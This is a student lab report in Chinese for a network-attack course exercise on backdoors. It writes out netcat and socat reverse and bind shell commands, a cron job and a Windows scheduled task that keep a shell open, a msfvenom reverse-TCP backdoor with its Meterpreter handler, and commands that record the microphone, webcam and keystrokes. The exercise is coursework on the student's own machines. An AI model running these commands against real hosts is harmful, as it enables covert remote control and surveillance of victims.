2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
实验内容
1.使用netcat获取主机操作Shell,cron启动
2.使用socat获取主机操作Shell, 任务计划启动
3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
基础问题
- 例举你能想到的一个后门进入到你系统中的可能方式?
答:收到以银行或者学校名义给你发过来的虚假邮件,打开邮件并且下载邮件的附件之后,后门程序可能会进入你的计算机。 - 例举你知道的后门如何启动起来(win及linux)的方式?
答:通过修改注册表设置为开机自启动;进入挂马网站;下载一些有恶意程序绑定的软件。 - Meterpreter有哪些给你映像深刻的功能?
答:可以不用通过用户登录来访问计算机,并且随意进行开启摄像头,录制音频等操作。 如何发现自己有系统有没有被安装后门?
答:1.首先必须开启防火墙,而且防火墙对与某些危险操作的提示要仔细查看,不能疏忽。2.可以下载专业的杀毒软件(不要下载一些流氓软件如360),进行定期检查电脑。3.可以检测某些不常用的端口是否长时间开启,如果长时间开启说明电脑有一定的几率被植入了后门或者是病毒。实验过程
1.使用
netcat获取主机操作Shell,cron启动
1.windows下获得一个linux shell
1.在Linux中使用ifconfig查看Linux的ip地址

2.在Windows中使用ipconfig查看本机ip地址

3.windows打开监听:ncat.exe -l -p 5235,Linux反弹连接win:nc 192.168.1.101 5235 -e /bin/sh,并且在Windows cmd下使用ls命令查看是否成功。

2.Linux 下获得Windows的cmd程序
1.Linux运行监听指令:nc -l -p 5235,Windows反弹连接Linux:ncat.exe -e cmd.exe 192.168.245.128 5235,在Linux shell下使用dir命令。


3.在Linux与Windows之间进行数据传送
1.Windows下监听端口:ncat.exe -l -p 5235,,Linux下连接到Windows的端口:ncat 192.168.1.101 5235,建立连接之后,就可以传输数据:

2.使用socat获取主机操作Shell, 任务计划启动
1.使用netcat获取主机操作Shell,cron启动
1.Windows中使用ncat.exe -l 5235监听5235端口
2.在linux中,使用crontab -e指令编辑一条定时任务,选择编辑器时选择3,在底行插入57 * * * * /bin/netcat 192.168.1.101 5235 -e /bin/sh(每个小时的第57分钟反向连接Windows的5235端口)

3.:wq保存退出配置即生效,可通过crontab -l查看:

4.在系统时间到57分钟,就会在Windows中监听的cmd中发现获得了Linux shell

2.使用socat获取主机操作Shell, 任务计划启动
1.win7系统中鼠标右击计算机:计算机管理->系统工具->任务计划程序->创建任务

2.常规中填写任务名称如:20165235。

3.触发器-新建新建触发器,(按照图中步骤进行)

4.点击操作,将2操作所指的改为 启动程序.

5.导入socat.exe的路径,并添加参数:tcp-listen:5235 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口5235,同时把cmd.exe的stderr重定向到stdout上)

6.创建完成之后,按Windows+L快捷键锁定计算机,再次打开,运行之前创建的任务。

7.在Linux shell中输入socat - tcp:192.168.1.101:5235:

3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
1.在kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.245.128 LPORT=5235 -f exe > 20165235_backdoor.exe,生成后门程序20165235_backdoor.exe

2.在Windows中使用ncat.exe -lv5235 > 20165235_backdoor.exe

3.Linux中输入nc 192.168.1.101 5235 < 20165235_backdoor.exe。传输成功并且在Windows的ncat文件夹下查看后门程序。

4.再打开新的shell,并且使用msfconsole进入msf控制台:

5.输入use exploit/multi/handler:
6.使用和生成后门程序时相同的payload:set payload windows/meterpreter/reverse_tcp:
7.设置ip:set LHOST 192.168.245.128
9.设置端口:set LPORT 5235
10.使用exploit开始监听
11.在Windows cmd 中相应文件夹中执行:20165235_backdoor.exe,Linux获得Windows主机的连接,并且得到了远程控制的shell:

4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
1.在以上的操作之上,使用record_mic可以截获一段音频:


2.使用webcam_snap可以使用摄像头拍照:

3.使用creenshot可以进行截屏:

4.使用keyscan_start 记录下击键的过程,使用keyscan_dump读取击键的记录:

实验中遇到的问题
1.错误一:在进行第一个实验时出现如下错误:

解决方法:在Linux使用ifconfig时出现很多地址,我很随意的填上去了一个,经过我仔细查看,将192.168.245.130写入运行成功。
2.错误:在使用crontab -e指令编辑一条定时任务时,发现win7端没有监听到Linux的shell
解决方法:因为在底部加入指令时没有将#取除掉。
实验总结与体会
通过本次实验我首先明白了什么是后门。(后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法)。同时也学会了后门的基本原理,按照学长学姐以及同学的博客的指导下完成实验,学会了使用多种后门工具,同时也学会了如何防范别人对计算机的后门植入。在以后的学习生活中要注意网上安全,留意恶意程序。本此实验也有一定的趣味性,在完成后门植入后会有些许的成就感。
2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践的更多相关文章
- 2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践
2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动: 使用socat获取主机操作Shell, 任务 ...
- 20155326刘美岑 《网络对抗》Exp2 后门原理与实践
20155326刘美岑 <网络对抗>Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...
- 20155320《网络对抗》Exp2 后门原理与实践
20155320<网络对抗>Exp2 后门原理与实践 [实验内容] (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
- 20155208徐子涵《网络对抗》Exp2 后门原理与实践
20155208徐子涵<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:当我们在非官方网站上下载软件时,后门极有可能会进入我们 ...
- 20145236《网络对抗》Exp2 后门原理与实践
20145236<网络对抗>Exp2 后门原理与实践 目录: 一.基础问题回答 二.常用后门工具实践 2.1 Windows获得Linux Shell 2.2 Linux获得Windows ...
- 20155202 张旭《网络对抗》Exp2 后门原理与实践
20155202 张旭<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在软件中 注入在可执行文件里 注入在office文件的宏里面 ...
- 20155218《网络对抗》Exp2 后门原理与实践
20155218<网络对抗>Exp2 后门原理与实践 常用后门工具实践 1.Windows获得Linux Shell: 在Windows下,先使用ipconfig指令查看本机IP,使用nc ...
- 20155227《网络对抗》Exp2 后门原理与实践
20155227<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站下载软件时,后门很可能被捆绑在软件中. 攻击者利用欺 ...
- 20155232《网络对抗》Exp2 后门原理与实践
20155232<网络对抗>Exp2 后门原理与实践 问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 通过网页上弹出来的软件自动安装 2.例举你知道的后门如何启动起来(wi ...
随机推荐
- 《Exception团队》第二次作业:团队项目选题报告
一.项目基本介绍 项目 内容 这个作业属于哪个课程 任课教师博客主页链接 这个作业的要求在哪里 作业链接地址 团队名称 Exception 作业学习目标 深入了解软件思想,强化编程技术 二.项目细则 ...
- 异常值处理outlier
python信用评分卡(附代码,博主录制) https://study.163.com/course/introduction.htm?courseId=1005214003&utm_camp ...
- Linux之 proc文件系统
用户态与内核态交互的接口之一,管理方式与普通文件相同每个节点的文件权限(读/写)决定其查看和配置权限大量LINUX系统参数和状态信息可通过proc节点查看或配置/proc/<pid>/:查 ...
- AngularJs实现表单验证
首先,我们应该知道,表单中,常用的验证操作有: $dirty 表单有填写记录 $valid 字段内容合法的 $invalid 字段内容是非法的 $pristine 表单没有填写记录 $error 表单 ...
- DevExpress winform 友好皮肤
DevExpress设置默认皮肤及各种皮肤样式 DevExpress设置默认皮肤及各种皮肤样式 设置默认皮肤代码: 在程序入口Program.cs里添加如下代码 引用using DevExpres ...
- QButtonGroup按钮组
继承 QObject 提供 一个抽象的按钮容器, 可以将多个按钮划分为一组,不具备可视化的效果,一般放的都是可以被检查的按钮 import sys from PyQt5.QtWidgets impo ...
- [经验交流] kubernetes v1.11 更新了高可用方案
kubernetes v1.11已经发布了一段时间,和以前相比,一个显著亮点是更新了高可用方案: https://kubernetes.io/docs/setup/independent/high-a ...
- application.properties 文件和 application.yml 文件的区别
yml文件的好处,天然的树状结构,方便查看,最终会转成application.properties 注意点: 1,原有的key,例如spring.jpa.properties.hibernate.di ...
- 让你的Spring Boot应用快速运行在Docker上面
前置条件: 1. 服务器(我这边是CentOS7)上已经安装了Docker(安装步骤很简单,可以参考我上一篇博客) 2.服务器上已经安装了Java和Maven 在满足以上条件后,我们就可以开始了: 1 ...
- cookie记录横向滚动条位置
一.Css <style type="text/css"> #x{ width: 100%; white-space: nowrap; overflow-x: scro ...